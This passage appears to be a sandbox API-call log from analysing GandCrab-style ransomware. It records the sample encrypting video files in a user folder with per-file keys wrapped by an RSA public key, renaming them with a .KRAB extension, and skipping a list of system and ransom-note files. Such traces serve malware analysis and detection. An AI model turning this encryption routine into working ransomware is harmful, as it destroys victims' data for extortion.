[0099.619] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0099.619] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.620] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.620] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.620] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.620] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.620] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.620] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10112c0) returned 1 [0099.621] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.621] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.621] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.621] GetLastError () returned 0x0 [0099.621] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.621] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0099.621] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0099.622] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0099.622] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.622] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.622] GetLastError () returned 0x0 [0099.622] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0099.622] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.622] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TEjMJz3BzM9Zxn.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\tejmjz3bzm9zxn.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.623] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.623] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.623] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xbc0a, lpOverlapped=0x0) returned 1 [0099.636] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff43f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.637] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xbc0a, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xbc0a, lpOverlapped=0x0) returned 1 [0099.637] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.637] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.640] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.641] CloseHandle (hObject=0x434) returned 1 [0099.641] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.641] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TEjMJz3BzM9Zxn.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\tejmjz3bzm9zxn.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\TEjMJz3BzM9Zxn.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\tejmjz3bzm9zxn.mkv.krab")) returned 1 [0099.642] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.642] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.642] lstrcmpW (lpString1="Xvq7np7-gUA.mp4", lpString2=".") returned 1 [0099.643] lstrcmpW (lpString1="Xvq7np7-gUA.mp4", lpString2="..") returned 1 [0099.643] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="Xvq7np7-gUA.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Xvq7np7-gUA.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Xvq7np7-gUA.mp4" [0099.643] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.643] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Xvq7np7-gUA.mp4.KRAB") returned 49 [0099.643] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Xvq7np7-gUA.mp4") returned 44 [0099.643] lstrlenW (lpString=".mp4") returned 4 [0099.643] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.643] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0099.643] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.644] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Xvq7np7-gUA.mp4") returned 44 [0099.644] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Xvq7np7-gUA.mp4") returned 44 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="desktop.ini") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="autorun.inf") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="ntuser.dat") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="iconcache.db") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="bootsect.bak") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="boot.ini") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="ntuser.dat.log") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="thumbs.db") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="KRAB-DECRYPT.html") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="ntldr") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="NTDETECT.COM") returned 1 [0099.644] lstrcmpiW (lpString1="Xvq7np7-gUA.mp4", lpString2="Bootfont.bin") returned 1 [0099.644] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.645] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0099.645] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.646] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.646] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.646] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.646] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.646] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.646] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0099.647] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.647] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.647] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.647] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.647] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.647] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.648] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0099.648] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0099.648] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.648] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.649] GetLastError () returned 0x0 [0099.649] CryptDestroyKey (hKey=0xfbd920) returned 1 [0099.649] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.649] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0099.649] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.649] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.649] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.649] GetLastError () returned 0x0 [0099.650] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.650] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.650] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Xvq7np7-gUA.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xvq7np7-gua.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.652] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.652] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.652] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x16e89, lpOverlapped=0x0) returned 1 [0099.666] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffe9177, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.666] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x16e89, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x16e89, lpOverlapped=0x0) returned 1 [0099.666] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.667] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.670] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.671] CloseHandle (hObject=0x434) returned 1 [0099.671] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.671] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Xvq7np7-gUA.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xvq7np7-gua.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Xvq7np7-gUA.mp4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xvq7np7-gua.mp4.krab")) returned 1 [0099.672] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.672] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.672] lstrcmpW (lpString1="yfNv18pnZu7NIl.avi", lpString2=".") returned 1 [0099.673] lstrcmpW (lpString1="yfNv18pnZu7NIl.avi", lpString2="..") returned 1 [0099.673] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="yfNv18pnZu7NIl.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\yfNv18pnZu7NIl.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\yfNv18pnZu7NIl.avi" [0099.673] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.673] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\yfNv18pnZu7NIl.avi.KRAB") returned 52 [0099.673] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\yfNv18pnZu7NIl.avi") returned 47 [0099.673] lstrlenW (lpString=".avi") returned 4 [0099.673] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.673] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".avi ") returned 5 [0099.673] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.674] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\yfNv18pnZu7NIl.avi") returned 47 [0099.674] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\yfNv18pnZu7NIl.avi") returned 47 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="desktop.ini") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="autorun.inf") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="ntuser.dat") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="iconcache.db") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="bootsect.bak") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="boot.ini") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="ntuser.dat.log") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="thumbs.db") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="ntldr") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="NTDETECT.COM") returned 1 [0099.674] lstrcmpiW (lpString1="yfNv18pnZu7NIl.avi", lpString2="Bootfont.bin") returned 1 [0099.674] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.675] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10111b0) returned 1 [0099.675] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.675] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.676] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.676] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.676] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0099.676] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.676] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011678) returned 1 [0099.676] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.677] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.677] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.677] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.677] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0099.677] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.678] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0099.678] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.678] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.678] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.678] GetLastError () returned 0x0 [0099.679] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.679] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.679] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0099.679] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0099.679] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.679] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.679] GetLastError () returned 0x0 [0099.679] CryptDestroyKey (hKey=0xfbd920) returned 1 [0099.680] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.680] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\yfNv18pnZu7NIl.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\yfnv18pnzu7nil.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.680] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.680] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.681] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x8f7d, lpOverlapped=0x0) returned 1 [0099.704] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff7083, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.704] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x8f7d, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x8f7d, lpOverlapped=0x0) returned 1 [0099.704] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.704] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.708] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.708] CloseHandle (hObject=0x434) returned 1 [0099.708] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.709] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\yfNv18pnZu7NIl.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\yfnv18pnzu7nil.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\yfNv18pnZu7NIl.avi.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\yfnv18pnzu7nil.avi.krab")) returned 1 [0099.709] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.710] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.710] lstrcmpW (lpString1="Yu_oR_Jf.mkv", lpString2=".") returned 1 [0099.710] lstrcmpW (lpString1="Yu_oR_Jf.mkv", lpString2="..") returned 1 [0099.711] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="Yu_oR_Jf.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Yu_oR_Jf.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Yu_oR_Jf.mkv" [0099.711] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.711] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Yu_oR_Jf.mkv.KRAB") returned 46 [0099.711] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Yu_oR_Jf.mkv") returned 41 [0099.711] lstrlenW (lpString=".mkv") returned 4 [0099.711] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.711] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0099.711] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.712] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Yu_oR_Jf.mkv") returned 41 [0099.712] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Yu_oR_Jf.mkv") returned 41 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="desktop.ini") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="autorun.inf") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="ntuser.dat") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="iconcache.db") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="bootsect.bak") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="boot.ini") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="ntuser.dat.log") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="thumbs.db") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="KRAB-DECRYPT.html") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="ntldr") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="NTDETECT.COM") returned 1 [0099.712] lstrcmpiW (lpString1="Yu_oR_Jf.mkv", lpString2="Bootfont.bin") returned 1 [0099.712] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.713] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0099.713] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.714] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.714] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.714] CryptGenRandom (in: 